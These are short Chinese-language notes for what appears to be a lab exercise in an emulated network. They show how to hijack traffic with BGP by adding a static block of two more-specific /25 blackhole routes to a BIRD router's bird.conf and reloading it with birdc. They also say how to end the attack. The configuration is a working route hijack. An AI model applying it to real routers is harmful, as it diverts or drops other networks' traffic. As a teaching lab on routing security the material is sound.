正常路径:
最左结点 ping 10.154.0.71(最右节点)
filter写icmp,如果显示来去路径则不一致,再添上&&dst = 10.154.0.71
选取任意其他连通的router(注意不是主机,只有router才有bird)进行bgp攻击,修改conf文件
cd /etc
cd bird
vi bird.conf
在最末尾加上这个
protocol static hijacks{
ipv4{
table t_bgp;
};
route 10.154.0.0/25 blackhole { bgp_large_community.add(LOCAL_COMM);};
route 10.154.0.128/25 blackhole { bgp_large_community.add(LOCAL_COMM);};
}
root@bc8e1b39887f /etc/bird # birdc configure
BIRD 2.0.7 ready.
Reading configuration from /etc/bird/bird.conf
Reconfigured
然后流量就会被导入到攻击router上,攻击成功。
如果想要结束攻击,除了修改configure,也可以直接disable 攻击router与as的连接。